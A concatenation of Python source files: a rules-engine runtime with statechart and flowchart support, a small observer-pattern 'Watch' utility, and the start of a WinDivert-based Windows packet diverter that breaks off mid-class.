ruleset_name = self.ruleset_name
if not 'sid' in message:
message['sid'] = self.s.sid
if isinstance(message, Content):
message = message._d
message_list = []
if ruleset_name in self._message_directory:
message_list = self._message_directory[ruleset_name]
else:
self._message_directory[ruleset_name] = message_list
message_list.append(message)
def delete(self, ruleset_name = None, sid = None):
if not ruleset_name:
ruleset_name = self.ruleset_name
if not sid:
sid = self.s.sid
if (ruleset_name == self.ruleset_name) and (sid == self.s.sid):
self._deleted = True
sid_list = []
if ruleset_name in self._delete_directory:
sid_list = self._delete_directory[ruleset_name]
else:
self._delete_directory[ruleset_name] = sid_list
sid_list.append(sid)
def start_timer(self, timer_name, duration, manual_reset = False):
if timer_name in self._timer_directory:
raise Exception('Timer with name {0} already added'.format(timer_name))
else:
timer = {'sid': self.s.sid, '$t': timer_name}
self._timer_directory[timer_name] = (timer, duration, manual_reset)
def cancel_timer(self, timer_name):
if timer_name in self._cancelled_timer_directory:
raise Exception('Timer with name {0} already cancelled'.format(timer_name))
else:
self._cancelled_timer_directory[timer_name] = True
def _retract_timer(self, timer_name, message):
if '$t' in message and message['$t'] == timer_name:
self.retract_fact(message)
return True
for property_name, property_value in message.items():
if isinstance(property_value, dict) and self._retract_timer(timer_name, property_value):
return True
return False
def reset_timer(self, timer_name):
if self._m:
return self._retract_timer(timer_name, self._m)
else:
for message in self.m:
if self._retract_timer(timer_name, message):
return True
return False
def assert_fact(self, ruleset_name, fact = None):
if not fact:
fact = ruleset_name
ruleset_name = self.ruleset_name
if not 'sid' in fact:
fact['sid'] = self.s.sid
if isinstance(fact, Content):
fact = copy.deepcopy(fact._d)
fact_list = []
if ruleset_name in self._fact_directory:
fact_list = self._fact_directory[ruleset_name]
else:
self._fact_directory[ruleset_name] = fact_list
fact_list.append(fact)
def retract_fact(self, ruleset_name, fact = None):
if not fact:
fact = ruleset_name
ruleset_name = self.ruleset_name
if not 'sid' in fact:
fact['sid'] = self.s.sid
if isinstance(fact, Content):
fact = copy.deepcopy(fact._d)
retract_list = []
if ruleset_name in self._retract_directory:
retract_list = self._retract_directory[ruleset_name]
else:
self._retract_directory[ruleset_name] = retract_list
retract_list.append(fact)
def renew_action_lease(self):
if _unix_now() - self._start_time < 10:
self._start_time = _unix_now()
self.host.renew_action_lease(self.ruleset_name, self.s.sid)
def _has_completed(self):
if _unix_now() - self._start_time > 10:
self._completed = True
value = self._completed
self._completed = True
return value
def _is_deleted(self):
return self._deleted
def __getattr__(self, name):
if name == '_m':
return None
if name in self._m:
return Content(self._m[name])
else:
return None
class Content(object):
def items(self):
return self._d.items()
def __init__(self, data):
self._d = data
def __getitem__(self, key):
if key in self._d:
data = self._d[key]
if isinstance(data, dict):
data = Content(data)
return data
else:
return None
def __setitem__(self, key, value):
if value == None:
del self._d[key]
elif isinstance(value, Content):
self._d[key] = value._d
else:
self._d[key] = value
def __iter__(self):
return self._d.__iter__
def __contains__(self, key):
return key in self._d
def __getattr__(self, name):
return self.__getitem__(name)
def __setattr__(self, name, value):
if name == '_d':
self.__dict__['_d'] = value
else:
self.__setitem__(name, value)
def __repr__(self):
return repr(self._d)
def __str__(self):
return str(self._d)
class Promise(object):
def __init__(self, func):
self._func = func
self._next = None
self._sync = True
self._timer = None
self.root = self
arg_count = func.__code__.co_argcount
if inspect.ismethod(func):
arg_count -= 1
if arg_count == 2:
self._sync = False
elif arg_count != 1:
raise Exception('Invalid function signature')
def continue_with(self, next):
if (isinstance(next, Promise)):
self._next = next
elif (hasattr(next, '__call__')):
self._next = Promise(next)
else:
raise Exception('Unexpected Promise Type')
self._next.root = self.root
return self._next
def run(self, c, complete):
def timeout(max_time):
if _unix_now() > max_time:
c.s.exception = 'timeout expired'
complete(None)
else:
c.renew_action_lease()
self._timer = threading.Timer(5, timeout, (max_time, ))
self._timer.daemon = True
self._timer.start()
if self._sync:
try:
self._func(c)
except BaseException as error:
t, v, tb = sys.exc_info()
c.s.exception = 'exception caught {0}, traceback {1}'.format(
str(error), traceback.format_tb(tb))
except:
c.s.exception = 'unknown exception'
if self._next:
self._next.run(c, complete)
else:
complete(None)
else:
try:
def callback(e):
if self._timer:
self._timer.cancel()
self._timer = None
if e:
c.s.exception = str(e)
if self._next:
self._next.run(c, complete)
else:
complete(None)
time_left = self._func(c, callback)
if time_left:
self._timer = threading.Timer(5, timeout, (_unix_now() + time_left, ))
self._timer.daemon = True
self._timer.start()
except BaseException as error:
t, v, tb = sys.exc_info()
c.s.exception = 'exception caught {0}, traceback {1}'.format(
str(error), traceback.format_tb(tb))
complete(None)
except:
c.s.exception = 'unknown exception'
complete(None)
class To(Promise):
def __init__(self, from_state, to_state, assert_state):
super(To, self).__init__(self._execute)
self._from_state = from_state
self._to_state = to_state
self._assert_state = assert_state
def _execute(self, c):
c.s.running = True
if self._from_state != self._to_state:
if self._from_state:
if c.m and isinstance(c.m, list):
c.retract_fact(c.m[0].chart_context)
else:
c.retract_fact(c.chart_context)
if self._assert_state:
c.assert_fact({ 'label': self._to_state, 'chart': 1 })
else:
c.post({ 'label': self._to_state, 'chart': 1 })
class Ruleset(object):
def __init__(self, name, host, ruleset_definition, state_cache_size):
self._actions = {}
self._name = name
self._host = host
for rule_name, rule in ruleset_definition.items():
action = rule['run']
del rule['run']
if isinstance(action, str):
self._actions[rule_name] = Promise(host.get_action(action))
elif isinstance(action, Promise):
self._actions[rule_name] = action.root
elif (hasattr(action, '__call__')):
self._actions[rule_name] = Promise(action)
self._handle = rules.create_ruleset(state_cache_size, name, json.dumps(ruleset_definition, ensure_ascii=False))
self._definition = ruleset_definition
def bind(self, databases):
for db in databases:
if isinstance(db, str):
rules.bind_ruleset(0, 0, db, None, self._handle)
else:
if not 'password' in db:
db['password'] = None
if not 'db' in db:
db['db'] = 0
rules.bind_ruleset(db['port'], db['db'], db['host'], db['password'], self._handle)
def assert_event(self, message):
return rules.assert_event(self._handle, json.dumps(message, ensure_ascii=False))
def queue_assert_event(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_assert_event(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_assert_event(self, message):
return rules.start_assert_event(self._handle, json.dumps(message, ensure_ascii=False))
def assert_events(self, messages):
return rules.assert_events(self._handle, json.dumps(messages, ensure_ascii=False))
def start_assert_events(self, messages):
return rules.start_assert_events(self._handle, json.dumps(messages, ensure_ascii=False))
def assert_fact(self, fact):
return rules.assert_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def queue_assert_fact(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_assert_fact(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_assert_fact(self, fact):
return rules.start_assert_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def assert_facts(self, facts):
return rules.assert_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_assert_facts(self, facts):
return rules.start_assert_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def retract_fact(self, fact):
return rules.retract_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def queue_retract_fact(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_retract_fact(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_retract_fact(self, fact):
return rules.start_retract_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def retract_facts(self, facts):
return rules.retract_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_retract_facts(self, facts):
return rules.start_retract_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_timer(self, sid, timer, timer_duration, manual_reset):
if sid != None:
sid = str(sid)
rules.start_timer(self._handle, timer_duration, manual_reset, json.dumps(timer, ensure_ascii=False), sid)
def cancel_timer(self, sid, timer_name):
if sid != None:
sid = str(sid)
rules.cancel_timer(self._handle, sid, timer_name)
def assert_state(self, state):
if 'sid' in state:
return rules.assert_state(self._handle, str(state['sid']), json.dumps(state, ensure_ascii=False))
else:
return rules.assert_state(self._handle, None, json.dumps(state, ensure_ascii=False))
def get_state(self, sid):
if sid != None:
sid = str(sid)
return json.loads(rules.get_state(self._handle, sid))
def delete_state(self, sid):
if sid != None:
sid = str(sid)
rules.delete_state(self._handle, sid)
def renew_action_lease(self, sid):
if sid != None:
sid = str(sid)
rules.renew_action_lease(self._handle, sid)
def get_definition(self):
return self._definition
@staticmethod
def create_rulesets(parent_name, host, ruleset_definitions, state_cache_size):
branches = {}
for name, definition in ruleset_definitions.items():
if name.rfind('$state') != -1:
name = name[:name.rfind('$state')]
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Statechart(name, host, definition, state_cache_size)
elif name.rfind('$flow') != -1:
name = name[:name.rfind('$flow')]
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Flowchart(name, host, definition, state_cache_size)
else:
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Ruleset(name, host, definition, state_cache_size)
return branches
def dispatch_timers(self, complete):
try:
if not rules.assert_timers(self._handle):
complete(None, True)
else:
complete(None, False)
except Exception as error:
complete(error, True)
return
def dispatch(self, complete, async_result = None):
state = None
action_handle = None
action_binding = None
result_container = {}
if async_result:
state = async_result[0]
result_container = {'message': json.loads(async_result[1])}
action_handle = async_result[2]
action_binding = async_result[3]
else:
try:
result = rules.start_action(self._handle)
if not result:
complete(None, True)
return
else:
state = json.loads(result[0])
result_container = {'message': json.loads(result[1])}
action_handle = result[2]
action_binding = result[3]
except BaseException as error:
t, v, tb = sys.exc_info()
print('start action base exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
complete(error, True)
return
except:
t, v, tb = sys.exc_info()
print('start action unknown exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
complete('unknown error', True)
return
while 'message' in result_container:
action_name = None
for action_name, message in result_container['message'].items():
break
del(result_container['message'])
c = Closure(self._host, state, message, action_handle, self._name)
def action_callback(e):
if c._has_completed():
return
if e:
rules.abandon_action(self._handle, c._handle)
complete(e, True)
else:
try:
for timer_name, timer in c.get_cancelled_timers().items():
self.cancel_timer(c.s['sid'], timer_name)
for timer_id, timer_tuple in c.get_timers().items():
self.start_timer(c.s['sid'], timer_tuple[0], timer_tuple[1], timer_tuple[2])
for ruleset_name, q in c.get_queues().items():
for message in q.get_queued_posts():
self.queue_assert_event(message['sid'], ruleset_name, message)
for message in q.get_queued_asserts():
self.queue_assert_fact(message['sid'], ruleset_name, message)
for message in q.get_queued_retracts():
self.queue_retract_fact(message['sid'], ruleset_name, message)
for ruleset_name, sid in c.get_deletes().items():
self._host.delete_state(ruleset_name, sid)
binding = 0
replies = 0
pending = {action_binding: 0}
for ruleset_name, facts in c.get_retract_facts().items():
if len(facts) == 1:
binding, replies = self._host.start_retract_fact(ruleset_name, facts[0])
else:
binding, replies = self._host.start_retract_facts(ruleset_name, facts)
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
for ruleset_name, facts in c.get_facts().items():
if len(facts) == 1:
binding, replies = self._host.start_assert_fact(ruleset_name, facts[0])
else:
binding, replies = self._host.start_assert_facts(ruleset_name, facts)
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
for ruleset_name, messages in c.get_messages().items():
if len(messages) == 1:
binding, replies = self._host.start_post(ruleset_name, messages[0])
else:
binding, replies = self._host.start_post_batch(ruleset_name, messages)
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
binding, replies = rules.start_update_state(self._handle, c._handle, json.dumps(c.s._d, ensure_ascii=False))
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
for binding, replies in pending.items():
if binding != 0:
if binding != action_binding:
rules.complete(binding, replies)
else:
new_result = rules.complete_and_start_action(self._handle, replies, c._handle)
if new_result:
if 'async' in result_container:
def terminal(e, wait):
return
self.dispatch(terminal, [state, new_result, action_handle, action_binding])
else:
result_container['message'] = json.loads(new_result)
except BaseException as error:
t, v, tb = sys.exc_info()
print('base exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
rules.abandon_action(self._handle, c._handle)
complete(error, True)
except:
print('unknown exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
rules.abandon_action(self._handle, c._handle)
complete('unknown error', True)
if c._is_deleted():
try:
self.delete_state(c.s.sid)
except BaseException as error:
complete(error, True)
if 'async' in result_container:
del result_container['async']
self._actions[action_name].run(c, action_callback)
result_container['async'] = True
complete(None, False)
class Statechart(Ruleset):
def __init__(self, name, host, chart_definition, state_cache_size):
self._name = name
self._host = host
ruleset_definition = {}
self._transform(None, None, None, chart_definition, ruleset_definition)
super(Statechart, self).__init__(name, host, ruleset_definition, state_cache_size)
self._definition = chart_definition
self._definition['$type'] = 'stateChart'
def _transform(self, parent_name, parent_triggers, parent_start_state, chart_definition, rules):
start_state = {}
reflexive_states = {}
for state_name, state in chart_definition.items():
qualified_name = state_name
if parent_name:
qualified_name = '{0}.{1}'.format(parent_name, state_name)
start_state[qualified_name] = True
for trigger_name, trigger in state.items():
if ('to' in trigger and trigger['to'] == state_name) or 'count' in trigger or 'cap' in trigger:
reflexive_states[qualified_name] = True
for state_name, state in chart_definition.items():
qualified_name = state_name
if parent_name:
qualified_name = '{0}.{1}'.format(parent_name, state_name)
triggers = {}
if parent_triggers:
for parent_trigger_name, trigger in parent_triggers.items():
triggers['{0}.{1}'.format(qualified_name, parent_trigger_name)] = trigger
for trigger_name, trigger in state.items():
if trigger_name != '$chart':
if ('to' in trigger) and parent_name:
trigger['to'] = '{0}.{1}'.format(parent_name, trigger['to'])
triggers['{0}.{1}'.format(qualified_name, trigger_name)] = trigger
if '$chart' in state:
self._transform(qualified_name, triggers, start_state, state['$chart'], rules)
else:
for trigger_name, trigger in triggers.items():
rule = {}
state_test = {'chart_context': {'$and':[{'label': qualified_name}, {'chart': 1}]}}
if 'pri' in trigger:
rule['pri'] = trigger['pri']
if 'count' in trigger:
rule['count'] = trigger['count']
if 'cap' in trigger:
rule['cap'] = trigger['cap']
if 'all' in trigger:
rule['all'] = list(trigger['all'])
rule['all'].append(state_test)
elif 'any' in trigger:
rule['all'] = [state_test, {'m$any': trigger['any']}]
else:
rule['all'] = [state_test]
if 'run' in trigger:
if isinstance(trigger['run'], str):
rule['run'] = Promise(self._host.get_action(trigger['run']))
elif isinstance(trigger['run'], Promise):
rule['run'] = trigger['run']
elif hasattr(trigger['run'], '__call__'):
rule['run'] = Promise(trigger['run'])
if 'to' in trigger:
from_state = None
if qualified_name in reflexive_states:
from_state = qualified_name
to_state = trigger['to']
assert_state = False
if to_state in reflexive_states:
assert_state = True
if 'run' in rule:
rule['run'].continue_with(To(from_state, to_state, assert_state))
else:
rule['run'] = To(from_state, to_state, assert_state)
if to_state in start_state:
del start_state[to_state]
if parent_start_state and to_state in parent_start_state:
del parent_start_state[to_state]
else:
raise Exception('Trigger {0} destination not defined'.format(trigger_name))
rules[trigger_name] = rule;
started = False
for state_name in start_state.keys():
if started:
raise Exception('Chart {0} has more than one start state {1}'.format(self._name, state_name))
started = True
if parent_name:
rules[parent_name + '$start'] = {'all':[{'chart_context': {'$and': [{'label': parent_name}, {'chart':1}]}}], 'run': To(None, state_name, False)};
else:
rules['$start'] = {'all': [{'chart_context': {'$and': [{'$nex': {'running': 1}}, {'$s': 1}]}}], 'run': To(None, state_name, False)};
if not started:
raise Exception('Chart {0} has no start state'.format(self._name))
class Flowchart(Ruleset):
def __init__(self, name, host, chart_definition, state_cache_size):
self._name = name
self._host = host
ruleset_definition = {}
self._transform(chart_definition, ruleset_definition)
super(Flowchart, self).__init__(name, host, ruleset_definition, state_cache_size)
self._definition = chart_definition
self._definition['$type'] = 'flowChart'
def _transform(self, chart_definition, rules):
visited = {}
reflexive_stages = {}
for stage_name, stage in chart_definition.items():
if 'to' in stage:
if isinstance(stage['to'], str):
if stage['to'] == stage_name:
reflexive_stages[stage_name] = True
else:
for transition_name, transition in stage['to'].items():
if transition_name == stage_name or 'count' in transition or 'cap' in transition:
reflexive_stages[stage_name] = True
for stage_name, stage in chart_definition.items():
stage_test = {'chart_context': {'$and':[{'label': stage_name}, {'chart':1}]}}
from_stage = None
if stage_name in reflexive_stages:
from_stage = stage_name
if 'to' in stage:
if isinstance(stage['to'], str):
next_stage = None
rule = {'all': [stage_test]}
if stage['to'] in chart_definition:
next_stage = chart_definition[stage['to']]
else:
raise Exception('Stage {0} not found'.format(stage['to']))
assert_stage = False
if stage['to'] in reflexive_stages:
assert_stage = True
if not 'run' in next_stage:
rule['run'] = To(from_stage, stage['to'], assert_stage)
else:
if isinstance(next_stage['run'], str):
rule['run'] = To(from_stage, stage['to'], assert_stage).continue_with(Promise(self._host.get_action(next_stage['run'])))
elif isinstance(next_stage['run'], Promise) or hasattr(next_stage['run'], '__call__'):
rule['run'] = To(from_stage, stage['to'], assert_stage).continue_with(next_stage['run'])
rules['{0}.{1}'.format(stage_name, stage['to'])] = rule
visited[stage['to']] = True
else:
for transition_name, transition in stage['to'].items():
rule = {}
next_stage = None
if 'pri' in transition:
rule['pri'] = transition['pri']
if 'count' in transition:
rule['count'] = transition['count']
if 'cap' in transition:
rule['cap'] = transition['cap']
if 'all' in transition:
rule['all'] = list(transition['all'])
rule['all'].append(stage_test)
elif 'any' in transition:
rule['all'] = [stage_test, {'m$any': transition['any']}]
else:
rule['all'] = [stage_test]
if transition_name in chart_definition:
next_stage = chart_definition[transition_name]
else:
raise Exception('Stage {0} not found'.format(transition_name))
assert_stage = False
if transition_name in reflexive_stages:
assert_stage = True
if not 'run' in next_stage:
rule['run'] = To(from_stage, transition_name, assert_stage)
else:
if isinstance(next_stage['run'], str):
rule['run'] = To(from_stage, transition_name, assert_stage).continue_with(Promise(self._host.get_action(next_stage['run'])))
elif isinstance(next_stage['run'], Promise) or hasattr(next_stage['run'], '__call__'):
rule['run'] = To(from_stage, transition_name, assert_stage).continue_with(next_stage['run'])
rules['{0}.{1}'.format(stage_name, transition_name)] = rule
visited[transition_name] = True
started = False
for stage_name, stage in chart_definition.items():
if not stage_name in visited:
if started:
raise Exception('Chart {0} has more than one start state'.format(self._name))
rule = {'all': [{'chart_context': {'$and': [{'$nex': {'running': 1}}, {'$s': 1}]}}]}
if not 'run' in stage:
rule['run'] = To(None, stage_name, False)
else:
if isinstance(stage['run'], str):
rule['run'] = To(None, stage_name, False).continue_with(Promise(self._host.get_action(stage['run'])))
elif isinstance(stage['run'], Promise) or hasattr(stage['run'], '__call__'):
rule['run'] = To(None, stage_name, False).continue_with(stage['run'])
rules['$start.{0}'.format(stage_name)] = rule
started = True
class Host(object):
def __init__(self, ruleset_definitions = None, databases = None, state_cache_size = 1024):
if not databases:
databases = [{'host': 'localhost', 'port': 6379, 'password': None, 'db': 0}]
self._ruleset_directory = {}
self._ruleset_list = []
self._databases = databases
self._state_cache_size = state_cache_size
if ruleset_definitions:
self.register_rulesets(None, ruleset_definitions)
def get_action(self, action_name):
raise Exception('Action with name {0} not found'.format(action_name))
def load_ruleset(self, ruleset_name):
raise Exception('Ruleset with name {0} not found'.format(ruleset_name))
def save_ruleset(self, ruleset_name, ruleset_definition):
return
def get_ruleset(self, ruleset_name):
if ruleset_name in self._ruleset_directory:
return self._ruleset_directory[ruleset_name]
else:
ruleset_definition = self.load_ruleset(ruleset_name)
self.register_rulesets(None, ruleset_definition)
return self._ruleset_directory[ruleset_name]
def set_ruleset(self, ruleset_name, ruleset_definition):
self.register_rulesets(None, ruleset_definition)
self.save_ruleset(ruleset_name, ruleset_definition)
def get_state(self, ruleset_name, sid):
return self.get_ruleset(ruleset_name).get_state(sid)
def delete_state(self, ruleset_name, sid):
self.get_ruleset(ruleset_name).delete_state(sid)
def post_batch(self, ruleset_name, messages):
return self.get_ruleset(ruleset_name).assert_events(messages)
def start_post_batch(self, ruleset_name, messages):
return self.get_ruleset(ruleset_name).start_assert_events(messages)
def post(self, ruleset_name, message):
if isinstance(message, list):
return self.post_batch(ruleset_name, message)
return self.get_ruleset(ruleset_name).assert_event(message)
def start_post(self, ruleset_name, message):
if isinstance(message, list):
return self.start_post_batch(ruleset_name, message)
return self.get_ruleset(ruleset_name).start_assert_event(message)
def assert_fact(self, ruleset_name, fact):
if isinstance(fact, list):
return self.assert_facts(ruleset_name, fact)
return self.get_ruleset(ruleset_name).assert_fact(fact)
def start_assert_fact(self, ruleset_name, fact):
if isinstance(fact, list):
return self.start_assert_facts(ruleset_name, fact)
return self.get_ruleset(ruleset_name).start_assert_fact(fact)
def assert_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).assert_facts(facts)
def start_assert_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).start_assert_facts(facts)
def retract_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).retract_fact(fact)
def start_retract_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).start_retract_fact(fact)
def retract_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).retract_facts(facts)
def start_retract_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).start_retract_facts(facts)
def patch_state(self, ruleset_name, state):
return self.get_ruleset(ruleset_name).assert_state(state)
def renew_action_lease(self, ruleset_name, sid):
self.get_ruleset(ruleset_name).renew_action_lease(sid)
def register_rulesets(self, parent_name, ruleset_definitions):
rulesets = Ruleset.create_rulesets(parent_name, self, ruleset_definitions, self._state_cache_size)
for ruleset_name, ruleset in rulesets.items():
if ruleset_name in self._ruleset_directory:
raise Exception('Ruleset with name {0} already registered'.format(ruleset_name))
else:
self._ruleset_directory[ruleset_name] = ruleset
self._ruleset_list.append(ruleset)
ruleset.bind(self._databases)
return list(rulesets.keys())
def run(self):
def dispatch_ruleset(index, wait):
def callback(e, w):
inner_wait = wait
if e:
if str(e).find('306') == -1:
print('Exiting {0}'.format(str(e)))
os._exit(1)
elif not w:
inner_wait = False
if (index == (len(self._ruleset_list) -1)) and inner_wait:
self._d_timer = threading.Timer(0.25, dispatch_ruleset, ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._d_timer.daemon = True
self._d_timer.start()
else:
self._d_timer = threading.Thread(target = dispatch_ruleset, args = ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._d_timer.daemon = True
self._d_timer.start()
if not len(self._ruleset_list):
self._d_timer = threading.Timer(0.5, dispatch_ruleset, (0, False, ))
self._d_timer.daemon = True
self._d_timer.start()
else:
ruleset = self._ruleset_list[index]
if not index:
wait = True
ruleset.dispatch(callback)
def dispatch_timers(index, wait):
def callback(e, w):
inner_wait = wait
if e:
print('Error {0}'.format(str(e)))
elif not w:
inner_wait = False
if (index == (len(self._ruleset_list) -1)) and inner_wait:
self._t_timer = threading.Timer(0.25, dispatch_timers, ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._t_timer.daemon = True
self._t_timer.start()
else:
self._t_timer = threading.Thread(target = dispatch_timers, args = ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._t_timer.daemon = True
self._t_timer.start()
if not len(self._ruleset_list):
self._t_timer = threading.Timer(0.5, dispatch_timers, (0, False, ))
self._t_timer.daemon = True
self._t_timer.start()
else:
ruleset = self._ruleset_list[index]
if not index:
wait = True
ruleset.dispatch_timers(callback)
self._d_timer = threading.Timer(0.1, dispatch_ruleset, (0, False, ))
self._d_timer.daemon = True
self._d_timer.start()
self._t_timer = threading.Timer(0.1, dispatch_timers, (0, False, ))
self._t_timer.daemon = True
self._t_timer.start()
class Queue(object):
def __init__(self, ruleset_name, database = None, state_cache_size = 1024):
if not database:
database = {'host': 'localhost', 'port': 6379, 'password':None, 'db': 0}
self._ruleset_name = ruleset_name
self._handle = rules.create_client(state_cache_size, ruleset_name)
if isinstance(database, str):
rules.bind_ruleset(0, 0, database, None, self._handle)
else:
if not 'password' in database:
database['password'] = None
if not 'db' in database:
database['db'] = 0
rules.bind_ruleset(database['port'], database['db'], database['host'], database['password'], self._handle)
def isClosed(self):
return self._handle == 0
def post(self, message):
if self._handle == 0:
raise Exception('Queue has already been closed')
if 'sid' in message:
rules.queue_assert_event(self._handle, str(message['sid']), self._ruleset_name, json.dumps(message, ensure_ascii=False))
else:
rules.queue_assert_event(self._handle, None, self._ruleset_name, json.dumps(message, ensure_ascii=False))
def assert_fact(self, message):
if self._handle == 0:
raise Exception('Queue has already been closed')
if 'sid' in message:
rules.queue_assert_fact(self._handle, str(message['sid']), self._ruleset_name, json.dumps(message, ensure_ascii=False))
else:
rules.queue_assert_fact(self._handle, None, self._ruleset_name, json.dumps(message, ensure_ascii=False))
def retract_fact(self, message):
if self._handle == 0:
raise Exception('Queue has already been closed')
if 'sid' in message:
rules.queue_retract_fact(self._handle, str(message['sid']), self._ruleset_name, json.dumps(message, ensure_ascii=False))
else:
rules.queue_retract_fact(self._handle, None, self._ruleset_name, json.dumps(message, ensure_ascii=False))
def close(self):
if self._handle != 0:
rules.delete_client(self._handle)
self._handle = 0
|
watch.py
|
from threading import Thread
class Watch:
""" Watch class to implement a data-observer pattern on the encapsulated data item.
The event-handlers/callbacks will be ran when the data is changed/set. """
def __init__(self, data=None):
""" Pass constructor the data item to be watched. None by default """
self.__data = data
# Create 2 Callback objects to store all the callback functions
self.on_set = Callback()
self.on_change = Callback()
# Decorated Method to use as an attribute to get watched/stored data
@property
def value(self):
return self.__data
# Method to set a value to the data variable watched by this class
def set(self, data):
# If set is called and data value has been changed, save the data and run on change callbacks
if data != self.__data: # Check for data equality, so will not work for object references
self.__data = data
# Run all the on_change callback functions
self.__event(self.on_change)
# Always run all the on_set callback functions when set method called
self.__event(self.on_set)
# Return self reference to allow method call chainings.
return self
# Method to remove all the Callbacks associated with the data
def clearAllListeners(self):
self.on_set.clear()
self.on_change.clear()
# Static Decorator function that wraps original function in try/except block
@staticmethod
def fn_wrapper(fn):
""" Callbacks are not wrapped on saving them into Callback Class objects because
when wrapped, their reference changes, and thus making it unable to be removed
from the list of callbacks using the reference to the original function.
Thus the wrapper should only be applied just before running the functions.
"""
# Define the inner wrapper function
def wrapped_fn(*args, **kwargs):
try:
# Try to call the original callback function with the arguements
fn(*args, **kwargs)
except TypeError:
# If the function does not except the arguements, call without any
fn()
# Below is alternative fn call with kwargs
# fn(**kwargs)
except:
# If the exception raised is not a TypeError, log it out
print('ERR: Unknown exception raised when calling callback function')
# Return the wrapped function back
return wrapped_fn
# "Hidden" method that is called when the data is changed, to run all the given callbacks in seperate threads
def __event(self, callbacks):
# Loop through and run all the callbacks as seperate threads
for cb in callbacks:
# The thread is used to run the wrapped function
Thread(target=self.fn_wrapper(cb), daemon=True, args=(self.__data,)).start()
# Method to return the string representation when str(obj) called
def __str__(self):
# 2 different ways to get the string representation.
# Method 1 better for objects for their string representation
return str(self.__data)
# Method 2 better for primitive data types
# return '{}'.format(self.__data)
# Allow user to call w to get data instead of w.value, where w = Watch(1)
__repr__ = value
# Allow user to do w(5) to pass set method the value 5, where w = Watch(1)
__call__ = set
class Callback:
"""
For the 'append' and 'remove' methods
Return self is NEEDED to allow user to call "data.on_set_callbacks += new_cb"
This is because if nothing is returned, the on_set_callbacks property of the data object
will be overwritten to point to new_cb instead of the callbacks with new_cb inside.
"""
def __init__(self, cbs=None):
""" Able to accept pre-constructed lists of callback functions """
if cbs == None:
# Create an empty list for this Callback object if none given
self.__cbs = []
else:
self.__cbs = cbs
# Method to get the callback-function list out from the object
@property
def get(self):
return self.__cbs
# Method to append data/callback-functions into the list
def append(self, cb):
if isinstance(cb, tuple):
for callback in cb:
self.__cbs.append(callback)
else:
self.__cbs.append(cb)
# Return self reference to allow method call chainings.
return self
# Method to remove data/callback-functions from the list
def remove(self, cb):
try:
self.__cbs.remove(cb)
except ValueError:
print('Invalid callback reference received for removing from "Callback" object!')
raise # Re-raise the Exception to print stack traceback and stop program execution
# Return self reference to allow method call chainings.
return self
# Method to clear all callback-functions from the list
def clear(self):
self.__cbs.clear()
# Return self reference to allow method call chainings.
return self
# Magic method to allow use of len() function call on this Class of objects
def __len__(self):
return len(self.__cbs)
# Shorthand to allow user to get the iterable by calling Callback_list instead of Callback_list.value
def __iter__(self):
# By using the iterable form from the list itself, __next__ does not need to be implemented
return iter(self.__cbs)
# Allow user to use these dunder methods to do +, -, +=, -= operations on this class of objects
__add__ = __iadd__ = append
__sub__ = __isub__ = remove
# Shorthand to allow user to append callback by calling callback(value)
__call__ = append
# Allow user to get the list when called directly, by using the get method
__repr__ = get
# Working on making this into a 'dict' like object to call callbacks specifically.
# def __getitem__(self, )
|
windows.py
|
# Diverter for Windows implemented using WinDivert library
import logging
from pydivert.windivert import *
import socket
import os
import dpkt
from . import fnpacket
import time
import threading
import platform
from .winutil import *
from .diverterbase import *
import subprocess
class WindowsPacketCtx(fnpacket.PacketCtx):
def __init__(self, lbl, wdpkt):
self.wdpkt = wdpkt
raw = wdpkt.raw.tobytes()
super(WindowsPacketCtx, self).__init__(lbl, raw)
# Packet mangling properties are extended here to also write the data to
# the pydivert.Packet object. This is because there appears to be no way to
# populate the pydivert.Packet object with plain octets unless you can also
# provide @interface and @direction arguments which do not appear at a
# glance to be directly available as attributes of pydivert.Packet,
# according to https://ffalcinelli.github.io/pydivert/
#
# Perhaps we can get these from wd_addr?
# src_ip overrides
@property
def src_ip(self):
return self._src_ip
@src_ip.setter
def src_ip(self, new_srcip):
super(self.__class__, self.__class__).src_ip.fset(self, new_srcip)
self.wdpkt.src_addr = new_srcip
# dst_ip overrides
@property
def dst_ip(self):
return self._dst_ip
@dst_ip.setter
def dst_ip(self, new_dstip):
super(self.__class__, self.__class__).dst_ip.fset(self, new_dstip)
self.wdpkt.dst_addr = new_dstip
# sport overrides
@property
def sport(self):
return self._sport
@sport.setter
def sport(self, new_sport):
